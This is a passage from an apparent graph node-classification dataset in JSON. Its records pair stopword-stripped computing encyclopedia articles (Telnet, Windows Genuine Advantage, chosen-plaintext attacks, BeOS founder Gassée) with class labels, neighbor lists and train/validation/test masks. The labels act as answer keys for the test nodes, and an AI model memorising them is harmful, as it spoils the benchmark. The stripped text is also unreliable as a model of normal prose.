product keys known widely used unauthorized installations product keys either intended use one copy retail system builder one oem bios locked copies one company volume license copies included product however number volume licence product keys mentioned avoid need activation posted internet used large number unauthorized installations service packs contain list keys update copies windows xp use microsoft developed new key verification engine windows xp service pack 2 could detect illicit keys even never used outcry security consultants feared denying security updates illegal installations windows xp would wide-ranging consequences even legal owners microsoft elected disable new key verification engine service pack 2 checks small list commonly used keys service pack 1 means service pack 2 install copies windows xp use older set copied keys use keys posted recently may able update systems try curb piracy based leaked generated volume license keys microsoft introduced windows genuine advantage wga wga comprises two parts verification tool must used get certain downloads microsoft user notification system wga windows followed verification systems internet explorer 7 windows media player 11 windows defender microsoft office 2007 certain updates late 2007 microsoft removed wga verification installer internet explorer 7 saying purpose change make ie7 available windows users license key judged genuine displays nag screen regular intervals asking user buy license microsoft addition user access microsoft update restricted critical security updates new versions enhancements microsoft products longer able downloaded installed august 26 2008 microsoft released new wga activation program displays plain black desktop background computers failing validation background changed reverts 1 hour common criticisms wga included description critical security update causing automatic updates download without user intervention default settings behavior compared spyware phoning home microsoft every time computer connected internet failure inform end users exactly wga would installed rectified 2006 update failure provide proper uninstallation method beta testing users given manual removal instructions work final build sensitivity hardware changes cause repeated need reactivation hands developers also user connection internet phone difficult activate normally strictly speaking neither download install notifications mandatory user change automatic update settings allow choose updates may downloaded installation update already downloaded user choose accept supplemental eula provided notifications cases user also request update presented newer critical security updates may still installed update hidden however setting effect existing version notifications appear new version 2006 california resident brian johnson attempted bring class action lawsuit microsoft grounds windows genuine advantage notifications violated spyware laws state lawsuit dismissed 2010",
    "neighbors": [
      10756,
      6150,
      6153,
      11283,
      3605,
      5666,
      11301,
      6697,
      1581,
      7215,
      8757,
      7739,
      582,
      1098,
      9812,
      8797,
      8798,
      4704,
      10338,
      8296,
      617,
      5225,
      8299,
      7796,
      6265,
      8315,
      636,
      639,
      641,
      651,
      6797,
      10896,
      2196,
      10900,
      3224,
      10392,
      7838,
      6827,
      3250,
      9910,
      7359,
      4289,
      194,
      2244,
      10957,
      4816,
      3283,
      3289,
      4316,
      740,
      9448,
      10989,
      1776,
      259,
      4356,
      11524,
      782,
      8976,
      3857,
      11030,
      11549,
      7456,
      7970,
      3875,
      10020,
      11559,
      1832,
      6441,
      7983,
      3890,
      11060,
      9525,
      6462,
      321,
      9033,
      6476,
      11605,
      2391,
      4439,
      7515,
      2919,
      877,
      9585,
      1916,
      8576,
      3463,
      1935,
      8080,
      4505,
      5531,
      929,
      4515,
      8103,
      3496,
      7615,
      9665,
      1474,
      7106,
      3527,
      9166,
      4051,
      9173,
      11221,
      5600,
      8681,
      4074,
      1515,
      5103,
      2041
    ],
    "mask": "None"
  },
  {
    "node_id": 11104,
    "label": 5,
    "text": "Web_Cache_Communication_Protocol:web cache communication protocol web cache communication protocol wccp cisco-developed content-routing protocol provides mechanism redirect traffic flows real-time built-in load balancing scaling fault tolerance service-assurance failsafe mechanisms cisco ios release 12.1 later releases allow use either version 1 wccpv1 version 2 wccpv2 protocol wccp allows utilization cisco cache engines caches running wccp localize web traffic patterns network enabling content requests fulfilled locally traffic localization reduces transmission costs download time wccpv1 wccpv2 whilst originally designed cisco content cache appliance since added support products including vendors also implemented wccp support products allows clustering transparent deployment networks using cisco routers/switches without additional hardware wccp particular use vendors web cache/proxy/security appliances redirection web traffic list includes",
    "neighbors": [
      704,
      3520,
      6569,
      10924,
      10574,
      5491,
      7411,
      4725,
      9055,
      10772,
      11413,
      3673,
      5178,
      5371,
      127
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11105,
    "label": 8,
    "text": "List_of_web_service_frameworks:list web service frameworks list web service frameworks",
    "neighbors": [
      8070,
      11413,
      4000,
      10020,
      10924,
      6328,
      1851,
      8640,
      4419,
      8644,
      7878,
      7261,
      479,
      8425,
      9834,
      4974,
      6127,
      3573,
      10486
    ],
    "mask": "Test"
  },
  {
    "node_id": 11106,
    "label": 2,
    "text": "Storage_violation:storage violation computing storage violation hardware software fault occurs task attempts access area computer storage permitted access storage violation instance consist reading writing freeing storage owned task common type storage violation known stack buffer overflow program attempts exceed limits set call stack also refer attempted modification memory owned another thread incomplete memory protection storage violations occur transaction systems cics circumstances possible write storage owned transaction violations reduced enabling features storage protection transaction isolation storage violations difficult detect program often run period time violation crashes example pointer freed area memory retained later reused causing error result efforts focus detecting violations occur rather later problem observed systems cics storage violations sometimes detected cics kernel use signatures tested see overlaid alternative runtime library may used better detect storage violations cost additional overhead programming languages use software bounds checking prevent occurrences program debugging software also detect violations testing",
    "neighbors": [
      8551,
      1801,
      5040,
      4562,
      9432,
      3323,
      10333
    ],
    "mask": "None"
  },
  {
    "node_id": 11107,
    "label": 3,
    "text": "Parity_flag:parity flag computer processors parity flag indicates numbers set bits odd even binary representation result last operation normally single bit processor status register example assume machine set parity flags indicates even parity result last operation 26 11010 binary parity flag would 0 since number set bits odd similarly result 10 1010 binary parity flag would 1 x86 processors parity flag reflects parity least significant byte result set number set bits ones even put another way parity bit set sum bits even according 80386 intel manual parity flag changed x86 processor family following instructions conditional jumps parity flag used e.g jp instruction jumps given target parity flag set jnp instruction jumps set flag may also read directly instructions pushf pushes flags register stack one common reason test parity flag check unrelated fpu flag fpu four condition flags c0 c3 tested directly must instead first copied flags register happens c0 placed carry flag c2 parity flag c3 zero flag c2 flag set e.g incomparable floating point values nan unsupported format compared fucom instructions",
    "neighbors": [
      6596,
      9028,
      9158,
      3630,
      4465,
      5234,
      3699,
      499,
      1461,
      7997
    ],
    "mask": "None"
  },
  {
    "node_id": 11108,
    "label": 2,
    "text": "Boot_image:boot image boot image type disk image computer file containing complete contents structure computer storage media transferred onto boot device allows associated hardware boot usually includes operating system utilities diagnostics well boot data recovery information also includes applications used organization-wide specialized image particular type user department called typically departmental boot image building image take days weeks involve complex decisions licensing permissions including passwords store boot image require users type requires experts software integration however built boot image simply copied onto devices patched within reasonable limits remains disposable case problems viruses particular possible unlike hard drive images may contain data et al pure boot images contain mission-critical data definition pure boot image contains data reproduced configurations off-the-shelf executables particular end-user data part boot image although operating systems require copy user preferences configuration files kept within boot image e.g microsoft windows registry utilities like norton ghost keep backup copy boot image quick re-imaging often called re-installation event problem thus avoiding need diagnose specific problem specific machine virtual machine infrastructure directly import export boot image direct installation bare metal i.e disk standard technique oems install identical copies operating system many identical machines boot image created virtual machine exported created one disk copied via boot image control infrastructure also makes virtual machine copies vmware vcenter converter instance lets users convert physical machines virtual machines free part company suite products make images easier back manage equivalents exist xen vm systems keeping boot image entirely separate disposable mandating boot image control organizations seek keep total cost operations including total cost ownership component low often organizations look uptime service one goal boot image control minimize number boot images used organization reduce support costs includes least many organizations use thin clients applications require high security involve unreliable users repurpose older machines continued use cascading strategy involves re-imaging older off-spec machines thin client boot images may continue use less demanding access-controlled applications",
    "neighbors": [
      3297,
      6153,
      5370,
      6797,
      3086,
      5296,
      7739,
      2714,
      2811,
      5596
    ],
    "mask": "None"
  },
  {
    "node_id": 11109,
    "label": 4,
    "text": "General_Dynamics_Mission_Systems:general dynamics mission systems general dynamics mission systems business unit american defense aerospace company general dynamics general dynamics mission systems integrates secure communication information systems technology general dynamics mission systems core manufacturing secure communications networks radios satellite technology defense cyber public safety intelligence communities general dynamics mission systems formed january 2015 general dynamics combined company c4 systems advanced information systems general dynamics c4 systems originally owned gte operated gte government systems general dynamics acquired gte government systems 1999 general dynamics advanced information systems provided mission-related systems development integration operations support general dynamics c4 systems leading integrator secure communications information systems technology lte general dynamics mission systems cell wheels cow deployable emergency lte solution used first responders public safety officials mobile cell tower able cover six square miles network created 2013 fortress lte technology includes virtual core network vcn enodeb base stations lte band 14 outdoor omni-directional user equipment c-band lte user equipment lte usb stick modem 4g evolved node b enodeb base stations software defined radios house digital baseband radio frequency rf circuits compact rugged mountable enclosure eliminate external interfaces reduce installation errors setup time range enodeb form factors offered different deployment scenarios support standard 4g lte band classes frequency ranges 400 mhz 6 ghz virtual core network vcn virtual 4g core network deployed wide range cots computing platforms vcn evolved packet core epc solution cyber cyber defense products include taclane network encryptors protecd r data-at-rest encryptors gem x™ encryptor manager pitbull operating system trusted network environment maritime strategic systems general dynamics mission systems acquired bluefin robotics february 2016 manufacturer unmanned undersea vehicles uuvs perform wide range missions u.s. military commercial customers independence-variant littoral combat ship lcs built general dynamics mission systems open architecture computing infrastructure open ci austal contracted build u.s. navy prime contractor subsequent 3.5 billion block buy 2010 august 2016 company successfully completed at-sea testing matador torpedo detection system build canada innovation program bcip tests conducted boat royal canadian navy ship matador acoustic processing system detecting tracking heavyweight anti-ship torpedoes radio communications cm-300/350 series version 2 radios latest additions air traffic control atc radios based faa nexcom segment 2 radio requirements rack mounted transmitter receiver systems specifically designed meet dynamic mission requirements air traffic control centers commercial airports military air stations range installations radio astronomy meerkat telescope array precursor telescope south africa ’ planned square kilometer array ska comprises 64 radio antennas south africa ’ northern cape province completed 2016 meerkat largest powerful radio telescope southern hemisphere ska array completed 2024 meerkat covers eight kilometers facilitate research cosmic magnetism galactic evolution large-scale structure cosmos dark matter nature transient radio sources among science projects space general dynamics mission systems provides integrated ground segments mobile user objective system muos used u.s. navy soon provide cell phone-like communications warfighters move intelligence systems tac-maas motion imagery processing exploitation system stanag 4609 nga motion imagery standard profile misp compliant international equivalent product d-vex sold australian-based subsidiary general dynamics mediaware win-t program win-t warfighter information network-tactical win-t army tactical communications system general dynamics army prime contractor win-t part general dynamics mission systems tactical voice data communications systems soldier network increment 1 fully deployed began fielding 2004 completed fielding 2012 november 2007 general dynamics announced 78 million order indefinite delivery quantity contract win-t increment 1 april 2015 general dynamics mission systems awarded 36 million army contract maintenance repair products related increment 1 june 2015 general dynamics secured contract increment 2 valued 219 million increment 2 includes additional capabilities mobile broadband increment 1 2 equipment remain field battalion company levels increment 3 completed",
    "neighbors": [
      10813,
      2346,
      7887,
      2384,
      3478,
      125
    ],
    "mask": "Test"
  },
  {
    "node_id": 11110,
    "label": 4,
    "text": "BCODE:bcode bcode identifier sent mobile phone/device used ticket/voucher/identification type token bcode sms message read electronically screen mobile device bcodes sent text message standard sms received 99 devices bcodes many uses advertising loyalty programs promotions ticketing bcode developed australian company 2003-2005 bcode simple sms text message looks something like text message read screen mobile phone/device decoded unique token id id used supply consumer unique experience",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 11111,
    "label": 7,
    "text": "Apache_Kudu:apache kudu apache kudu free open source column-oriented data store apache hadoop ecosystem compatible data processing frameworks hadoop environment provides completeness hadoop storage layer enable fast analytics fast data open source project build apache kudu began internal project cloudera first version apache kudu 1.0 released 19 september 2016 kudu designed optimized olap workloads like hbase real-time store supports key-indexed record lookup mutation kudu differs hbase since kudu datamodel traditional relational model hbase schemaless kudu on-disk representation truly columnar follows entirely different storage design hbase/bigtable",
    "neighbors": [
      9344,
      3,
      7816,
      10377,
      8460,
      7567,
      1296,
      6161,
      1047,
      8217,
      11161,
      6555,
      8860,
      6943,
      3877,
      10661,
      11303,
      1327,
      7983,
      823,
      4919,
      5047,
      4538,
      1851,
      6074,
      7485,
      7742,
      9789,
      7233,
      6338,
      4419,
      1222,
      1991,
      4294,
      7750,
      5066,
      8139,
      4944,
      1363,
      7767,
      8408,
      9179,
      7261,
      990,
      8799,
      10719,
      865,
      11235,
      8294,
      8425,
      8810,
      747,
      2163,
      6774,
      7159,
      1913,
      1018
    ],
    "mask": "None"
  },
  {
    "node_id": 11112,
    "label": 5,
    "text": "Telnet:telnet telnet application protocol used internet local area network provide bidirectional interactive text-oriented communication facility using virtual terminal connection user data interspersed in-band telnet control information 8-bit byte oriented data connection transmission control protocol tcp telnet developed 1969 beginning rfc 15 extended rfc 855 standardized internet engineering task force ietf internet standard std 8 one first internet standards name stands teletype network historically telnet provided access command-line interface usually operating system remote host including network equipment operating systems configuration utility including systems based windows nt however serious security concerns using telnet open network internet use purpose waned significantly favor ssh term telnet also used refer software implements client part protocol telnet client applications available virtually computer platforms telnet also used verb telnet means establish connection using telnet protocol either command line client graphical interface example common directive might change password telnet server log run passwd command cases user would telnetting unix-like server system network device router telnet client-server protocol based reliable connection-oriented transport typically protocol used establish connection transmission control protocol tcp port number 23 telnet server application telnetd listening telnet however predates tcp/ip originally run network control program ncp protocols even though telnet ad hoc protocol official definition march 5 1973 name actually referred teletype network protocol rfc 206 nic 7176 telnet makes connection clear many extensions made telnet negotiable options protocol architecture extensions adopted internet standards ietf documents std 27 std 32 extensions widely implemented others proposed standards ietf standards track see telnet best understood context user simple terminal using local telnet program known client program run logon session remote computer user communications needs handled telnet server program telnet initially developed 1969 users networked computers computer departments academic institutions large private government research facilities environment security nearly much concern became bandwidth explosion 1990s rise number people access internet extension number people attempting hack people servers made encrypted alternatives necessary experts computer security sans institute recommend use telnet remote logins discontinued normal circumstances following reasons security-related shortcomings seen usage telnet protocol drop rapidly especially public internet favor secure shell ssh protocol first released 1995 ssh practically replaced telnet older protocol used days rare cases access decades old legacy equipment support modern protocols ssh provides much functionality telnet addition strong encryption prevent sensitive data passwords intercepted public key authentication ensure remote computer actually claims happened early internet protocols extensions telnet protocol provide transport layer security tls security simple authentication security layer sasl authentication address concerns however telnet implementations support extensions relatively little interest implementing ssh adequate purposes note large number industrial scientific devices telnet available communication option built standard rs-232 port use serial server hardware appliance provide translation tcp/telnet data rs-232 serial data cases ssh option unless interface appliance configured ssh ibm 5250 3270 workstation emulation supported via custom telnet clients tn5250/tn3270 ibm servers clients servers designed pass ibm 5250 data streams telnet generally support ssl encryption ssh include 5250 emulation os/400 also known ibm port 992 default port secured telnet data octets except 0xff transmitted telnet sometimes used telnet client applications establish interactive raw tcp session due commonly mistaken belief session use iac functionally identical example user could make http request hand using command line version telnet client application follows case however network virtual terminal nvt rules requirement bare carriage return character cr ascii 13 followed nul ascii 0 character distinguish telnet protocol raw tcp sessions hand many systems possess true raw tcp clients netcat socat unix putty windows also used manually talk services without specialized client software nevertheless telnet still sometimes used debugging network services smtp irc http ftp pop3 servers issue commands server examine responses protocols ftp really uses telnet data format another difference telnet raw tcp session telnet 8-bit clean default 8-bit mode may negotiated high-bit-set octets may garbled mode requested requested non-telnet connection 8-bit mode named binary option intended transmit binary data characters though standard suggests interpretation codes 0000–0176 ascii offer meaning high-bit-set data octets attempt introduce switchable character encoding support like http nothing known actual software support",
    "neighbors": [
      6657,
      10242,
      516,
      5636,
      1030,
      3592,
      9736,
      8204,
      8211,
      7188,
      7702,
      6681,
      6682,
      6171,
      9757,
      10269,
      10271,
      6689,
      7713,
      35,
      9251,
      2085,
      10786,
      10788,
      7208,
      10791,
      3629,
      7214,
      8238,
      562,
      1586,
      2610,
      4661,
      9269,
      3639,
      11319,
      11321,
      5179,
      6204,
      3133,
      4158,
      5181,
      5694,
      4163,
      6723,
      11332,
      8262,
      8265,
      8266,
      4687,
      6231,
      8281,
      10341,
      10344,
      9834,
      3695,
      4723,
      3191,
      2679,
      4729,
      637,
      1664,
      5251,
      9860,
      649,
      9868,
      2701,
      6797,
      3727,
      3218,
      10387,
      9365,
      5118,
      11413,
      152,
      7325,
      2206,
      3742,
      10398,
      161,
      10910,
      9380,
      9381,
      3750,
      3751,
      3752,
      172,
      10924,
      6318,
      6319,
      9905,
      9908,
      9909,
      4793,
      6330,
      7865,
      4797,
      702,
      8386,
      7364,
      2245,
      10437,
      8905,
      5322,
      9930,
      1229,
      7885,
      5843,
      4310,
      7895,
      2777,
      10461,
      9438,
      7391,
      9440,
      3297,
      6369,
      2789,
      4326,
      2797,
      751,
      8432,
      8946,
      5875,
      2292,
      11509,
      3322,
      8443,
      5373,
      4863,
      6401,
      9987,
      3847,
      7943,
      1807,
      8976,
      1297,
      4369,
      5906,
      5397,
      10005,
      5402,
      5405,
      11554,
      8998,
      9511,
      7983,
      7984,
      10033,
      10035,
      823,
      6456,
      8504,
      2362,
      10748,
      829,
      5437,
      321,
      2373,
      2887,
      10057,
      10058,
      849,
      6993,
      1876,
      6997,
      2904,
      7003,
      4956,
      5469,
      5470,
      5471,
      5472,
      10589,
      1893,
      871,
      361,
      5482,
      7019,
      8554,
      8557,
      1902,
      367,
      5492,
      10104,
      891,
      6524,
      2430,
      2431,
      11647,
      3971,
      10115,
      10631,
      8584,
      4490,
      6028,
      6541,
      8080,
      7570,
      1435,
      5531,
      10144,
      10659,
      933,
      2983,
      5032,
      5036,
      8622,
      6577,
      2996,
      10171,
      11196,
      3005,
      3006,
      5054,
      9151,
      5572,
      9670,
      2509,
      9167,
      11218,
      3539,
      469,
      3030,
      5078,
      8669,
      8670,
      6624,
      10723,
      4071,
      10727,
      8169,
      8682,
      9705,
      3564,
      10732,
      494,
      5102,
      6133,
      6651,
      3580,
      2045,
      2558,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 11113,
    "label": 7,
    "text": "Microsoft_Dynamics_365:microsoft dynamics 365 dynamics 365 product line enterprise resource planning erp customer relationship management crm applications announced microsoft july 2016 general release november 1 2016 part microsoft dynamics product line dynamics 365 sold two editions business edition small medium-sized enterprises smes smbs enterprise edition medium large organizations business edition includes financials application based project code-named 'madeira enterprise edition comprises dynamics crm applications field service sales project service automation customer service plus microsoft powerapps together microsoft premier erp product known dynamics 365 operations july 1 2017 dynamics 365 line repackaged crm applications called customer engagement plan erp application called microsoft dynamics 365 finance operations however available part unified operations plan also includes standalone applications dynamics 365 talent dynamics 365 retail together two plans form dynamics 365 plan microsoft dynamics 365 contains 11 core modules",
    "neighbors": [
      7489,
      1539,
      5224,
      11113,
      1612,
      6797,
      7532,
      7983,
      1008,
      1680,
      10509,
      5750
    ],
    "mask": "Train"
  },
  {
    "node_id": 11114,
    "label": 2,
    "text": "Active_object_(Symbian_OS):active object symbian os active object framework callback-based form multitasking computer systems specifically form cooperative multitasking important feature symbian operating system within framework active objects may make requests asynchronous services e.g sending sms message asynchronous request made control returned calling object immediately i.e without waiting call complete caller may choose things returns control back operating system typically schedules tasks puts machine sleep makes request calling object includes reference asynchronous task completes operating system identifies thread containing requesting active object wakes active scheduler thread identifies object made request passes control back object implementation active objects symbian based around thread request semaphore incremented thread makes asynchronous request decremented request completed outstanding requests thread put sleep practice may many active objects thread task interact requesting things active objects threads may even request things implementation old idea developed handle software interruptions 70s operating system acting first object peripheral second one",
    "neighbors": [
      2345,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 11115,
    "label": 0,
    "text": "Text_nailing:text nailing text nailing tn information extraction method semi-automatically extracting structured information unstructured documents tn combines two concepts 1 human-interaction narrative text identify highly prevalent non-negated expressions 2 conversion expressions notes non-negated alphabetical-only representations create homogeneous representations traditional machine learning approaches text classification human expert required label phrases entire notes supervised learning algorithm attempts generalize associations apply new data contrast using non-negated distinct expressions eliminates need additional computational method achieve generalizability tn developed massachusetts general hospital tested multiple scenarios including extraction smoking status family history coronary artery disease identifying patients sleep disorders improve accuracy framingham risk score patients non-alcoholic fatty liver disease classify non-adherence type-2 diabetes comprehensive review regarding extracting information textual documents electronic health record available importance using non-negated expressions achieve increased accuracy text-based classifiers emphasized letter published communications acm october 2018 sample code extracting smoking status narrative notes using nailed expressions available github july 2018 researchers virginia tech university illinois urbana–champaign referred tn example progressive cyber-human intelligence pchi chen asch 2017 wrote machine learning situated peak inflated expectations soften subsequent crash “ trough disillusionment ” fostering stronger appreciation technology ’ capabilities limitations letter published communications acm beyond brute force emphasized brute force approach may perform better traditional machine learning algorithms applied text letter stated ... machine learning algorithms applied text rely assumption language includes infinite number possible expressions contrast across variety medical conditions observed clinicians tend use expressions describe patients conditions viewpoint published june 2018 concerning slow adoption data-driven findings medicine uri kartoun co-creator text nailing states ... text nailing raised skepticism reviewers medical informatics journals claimed relies simple tricks simplify text leans heavily human annotation tn indeed may seem like trick light ﬁrst glance actually fairly sophisticated method ﬁnally caught attention adventurous reviewers editors ultimately accepted publication human in-the-loop process way generate features using domain experts using domain experts come features novel concept however specific interfaces method helps domain experts create features likely novel case features experts create equivalent regular expressions removing non-alphabetical characters matching smokesppd equal regular expression /smokes ^a-za-z *ppd/ using regular expressions features text classification novel given features classifier manually set threshold authors decided performance set documents classifier parameters classifier case threshold set manually given features documents almost machine learning algorithm able find threshold likely better one authors note using support vector machines svm hundreds documents give inferior performance specify features documents svm trained/tested fair comparison would use features document sets used manual threshold classifier",
    "neighbors": [
      11221
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11116,
    "label": 4,
    "text": "Actiance:actiance actiance inc formerly known facetime communications american-based multinational corporation develops platforms required enable security management compliance unified communications web 2.0 social media channels headquartered redwood city california actiance supports leading social networks unified communications providers instant messaging platforms including facebook linkedin twitter aol google yahoo skype microsoft ibm cisco established 1997 actiance provided call center crm enablement instant messaging web chat email working closely aol yahoo msn microsoft actiance established industry first cap agreements certified access programs providing enhanced access public im networks 2000 actiance awarded innovative use real-time collaboration microsoft exchange conference 2001 company launched first compliance security solution im networks im auditor aimed specifically financial services sector needed comply government regulations enabled financial services organizations ability leverage power public instant messaging networks aol microsoft yahoo time-sensitive communications ensuring administrative controls place comply government regulations 2003 50 top 100 financial services firms worldwide needed comply securities exchange commission nasd record retention supervisory requirements using im auditor whilst others still questioning whether im place business networks actiance introduced first network appliance control use im enterprise 2004 capable preventing unauthorized im connections stopping peer-to-peer p2p filesharing sites kazaa grokster morpheus real time guardian rtg identified controlled access growing number applications traversed network without department ’ knowledge actiance continued add features rtg including support unified communication platforms microsoft office communications server ibm lotus sametime 2005 response growing threat worms spyware traversing im networks zero day defence system added 2008 actiance added new capabilities rtg ’ successor unified security gateway usg providing managers management security control 140 social networking sites 20,000 individual facebook widgets 400 web real-time applications making usg first secure web gateway combine content monitoring management security web 2.0 applications social networks instant messaging unified communications url filtering malware web antivirus protection 2010 saw another first actiance launched vantage imauditor ’ successor included stringent security compliance controls skype enterprise vantage provides granular security policy controls compliance features real time unified communications uc – providing management widest variety uc real time communications platforms including microsoft office communications server ibm lotus sametime public instant messaging platforms windows live skype web conferencing industry focused networks like reuters bloomberg yellowjacket later year include support microsoft lync server also 2010 actiance launched socialite enable security management compliance solution enterprises using social networks socialite provides granular control applications facebook linkedin twitter allows organisations comply regulatory compliance demanded organizations financial industry regulatory authority finra financial services authority available software-as-a-service deployment saas on-premises installation module usg socialite enable allows organizations control social media features communications users corporate network situated remotely january 2011 facetime communications announced changed name actiance following purchase facetime brand apple june 2011 actiance announced socialite engage new platform allows distributed teams share content engage clients prospects analyze impact content social media sites designed specifically enable investment insurance professionals distribute pre-approved content socialite engage enables organization manage social media secure compliant environment allowing users see glance content impact also leverages third party data sources internal systems data feeds highlights channels effective identifies potential sales leads",
    "neighbors": [
      8640,
      4068,
      488,
      3323,
      1467,
      2558,
      8735
    ],
    "mask": "Test"
  },
  {
    "node_id": 11117,
    "label": 7,
    "text": "Cloud-based_design_and_manufacturing:cloud-based design manufacturing cloud-based design manufacturing cbdm refers service-oriented networked product development model service consumers able configure products services reconfigure manufacturing systems infrastructure-as-a-service iaas platform-as-a-service paas hardware-as-a-service haas software-as-a-service saas adapted original cloud computing paradigm introduced realm computer-aided product development cloud-based design manufacturing gaining significant momentum attention academia industry cloud-based design manufacturing includes two aspects cloud-based design cloud-based manufacturing another related concept cloud manufacturing general popular cloud-based design cbd refers networked design model leverages cloud computing service-oriented architecture soa web 2.0 e.g. social network sites semantic web technologies support cloud-based engineering design services distributed collaborative environments cloud-based manufacturing cbm refers networked manufacturing model exploits on-demand access shared collection diversified distributed manufacturing resources form temporary reconfigurable production lines enhance efficiency reduce product lifecycle costs allow optimal resource allocation response variable-demand customer generated tasking enabling technologies cloud-based design manufacturing include cloud computing web 2.0 internet things iot service-oriented architecture soa term cloud-based design manufacturing cbdm initially coined dazhong wu david rosen dirk schaefer georgia tech 2012 purpose articulating new paradigm digital manufacturing design innovation distributed collaborative settings main objective cbdm reduce time cost associated maintaining information communication technology ict infrastructures design manufacturing enhancing digital manufacturing design innovation distributed collaborative environments adapting rapidly changing market demands 2014 research group also published worldwide first two books subjects cloud-based design manufacturing cbdm social product development spd springer edited dirk schaefer cbdm exhibits following key characteristics cbdm differs traditional collaborative distributed design manufacturing systems web-based systems agent-based systems number perspectives including 1 computing architecture 2 data storage 3 sourcing process 4 information communication technology infrastructure 5 business model 6 programming model 7 communication similar cloud computing cbdm services categorized four major deployment models public cloud private cloud hybrid cloud community cloud",
    "neighbors": [
      4194,
      9797,
      4107,
      9932,
      5202,
      10452,
      1048,
      7802
    ],
    "mask": "Train"
  },
  {
    "node_id": 11118,
    "label": 2,
    "text": "Jean-Louis_Gassée:jean-louis gassée jean-louis gassée born march 1944 paris france business executive best known former executive apple computer worked 1981 1990 also founded inc. creators beos computer operating system leaving became chairman palmsource inc. november 2004 gassée worked six years hewlett-packard 1968 1974 responsible overseeing launching company ’ first desktop scientific computer development sales organization france promotion sales manager europe geneva switzerland 1974 1981 gassée served chief executive officer french affiliates data general exxon office systems 1981 gassée became director european operations apple computer 1985 learning steve jobs plan oust ceo john sculley memorial day weekend sculley china gassée preemptively informed board directors eventually led jobs resignation apple later sculley personally appointed gassée jobs old position head macintosh development gassée introduced several macintosh products on-stage late 1980s including macintosh portable 1989 also macintosh iifx product introductions often comical gassée less formal many executives wore tailored suits necessary often addressed employees wearing black lambskin leather jacket single diamond-stud earring idea licensing mac os companies use brought various members apple jean-louis refused give idea maintaining macintosh powerful computer present superior architectural roadmap future expansion computer although many companies interested use os equipment—they interested idea then-ceo made personal phone call sculley gassée would none idea licensing mac os shelved mid-80s gassée started skunkworks project create eventually became newton messagepad 1987 apple ceo john sculley published memoir odyssey hope inspiring excellence ordered hardback copy apple employee apple expense shortly afterward gassée ordered paperback copy fred brooks mythical man-month product-development employees hope inspiring good sense project management brooks gave lecture nearby de anza college room filled apple employees copies book told stories confirmed conclusions 1988 gassée became head apple advanced product development worldwide marketing rumors taking president apple sculley circling rumors concerning michael spindler also circulating one point 1990 number apple employees held demonstration marching around circles carrying signs lawn front one apple building petition apple management retain gassée usa today reporter saw demonstration asked employee employee well aware apple rules divulging trade secrets press succinctly explained issues next day usa today reported apple employees many wearing black leather jackets berets honor gassée demonstrated persuade management keep apple fact person wearing leather jacket brown goatskin a-2 beret person asked explain purpose demonstration 1989 gassée successfully killed claris project 'drama aimed start new brand sell low-end macintosh computers gassée argued consumers would continue willing pay price premium full macintosh experience despite gassée efforts supporters 1990 left apple forced sculley apple board members dissatisfied performance delivering new products spindler got top job 1991 gassée started new venture inc. ambitious goal creating entire new computer platform hardware software ground number apple employees left including steve sakoman developer apple newton developed new operating system optimized multiple cpus multithreaded applications became known simply operating system beos beos written dual-processor machine bebox later development releases beos ported run macintosh macintosh clone makers including power computing motorola signed deals ship beos hardware os finalized light stopped production bebox selling around 2000 units focused entirely development beos 1996 apple computer decided abandon copland project rewrite modernize macintosh operating system beos many features apple sought around christmas time offered buy 120 million later raising bid 200 million however despite estimates total worth approximately 80 million gassée held 275 million apple balked surprise move apple went purchase next company former co-founder steve jobs earlier left apple found 429 million high price justified apple getting jobs next engineers tow nextstep used basis new operating system mac os x return jobs apple withdrew license make macintosh clones intel assistance beos moved plan b port x86 platform arguably never grew past cult following sold enough copies nascent development user community several thousand programs available including several dozen commercial products beos also used embedded operating system multimedia production systems edirol teac level control systems however partially due behind-the-scenes pressure microsoft successful getting top-tier oems bundle beos hardware hitachi ast major europe time gassée saw fundamental success end 1999 focus shift giving desktop os away free commercial distributions sold third-party vendors similar linux distributions focus beia build beos specifically targeted internet appliances company lost several employees disagreed strategy desire work appliance os vendor interest beia least one shipping product based sony evilla market internet appliances proved nearly non-existent laid employees 2001 assets remaining engineers bought palm inc. 11 million august gassée stayed transition left january 2002 leaving gassée served president ceo computer access technology corporation catc company made network protocol analyzers left within year catc purchased fall 2004 lecroy corporation competitor gassée resurfaced general partner allegis capital venture capital fund based palo alto california still position november 2004 gassée became chairman palmsource inc. several former executives engineers still worked beos technology worked use palm os cobalt version 6 february 2006 major customers—including palm inc. itself—who committed using cobalt release march 2006 started writing blog french called le blog de jean-louis gassée english jean-louis gassée blog blog active month contains four entries seen google tech talk february 2007 2009 started contributing regularly monday note blog newsletter covering intersection media technology 2010 gassée says asked nokia consult future company suggested nokia fire ceo olli-pekka kallasvuo drop symbian operating system favour google android february 2019 gassée member medium",
    "neighbors": [
      11649,
      4741,
      5384,
      9999,
      10386,
      6807,
      6554,
      4251,
      9123,
      1576,
      7983,
      9778,
      4665,
      1339,
      10691,
      6234,
      2282,
      1389,
      1776,
      6258,
      10871,
      7806,
      511
    ],
    "mask": "None"
  },
  {
    "node_id": 11119,
    "label": 4,
    "text": "Chosen-plaintext_attack:chosen-plaintext attack chosen-plaintext attack cpa attack model cryptanalysis presumes attacker obtain ciphertexts arbitrary plaintexts goal attack gain information reduces security encryption scheme modern ciphers aim provide semantic security also known ciphertext indistinguishability chosen-plaintext attack therefore design generally immune chosen-plaintext attacks correctly implemented chosen-plaintext attack adversary possibly adaptively ask ciphertexts arbitrary plaintext messages formalized allowing adversary interact encryption oracle viewed black box attacker ’ goal reveal part secret encryption key may seem infeasible practice attacker could obtain ciphertexts given plaintexts however modern cryptography implemented software hardware used diverse range applications many cases chosen-plaintext attack often feasible see also practice chosen-plaintext attacks become extremely important context public key cryptography encryption key public attackers encrypt plaintext choose two forms chosen-plaintext attacks general batch chosen-plaintext attack carried follows consider following extension situation last step cipher indistinguishable encryptions chosen-plaintext attack running experiment =1 adversary ca n't guess correctly probability non-negligibly better 1/2 following examples demonstrate ciphers meet security definitions may broken chosen-plaintext attack following attack caesar cipher allows full recovery secret key intricate complex encryption methodologies decryption method becomes resource-intensive however core concept still relatively following attack one-time pad allows full recovery secret key suppose message length key length equal world war ii us navy cryptanalysts discovered japan planning attack location referred af believed af might midway island locations hawaiian islands codewords began prove hypothesis af corresponded midway island asked us forces midway send plaintext message low supplies japanese 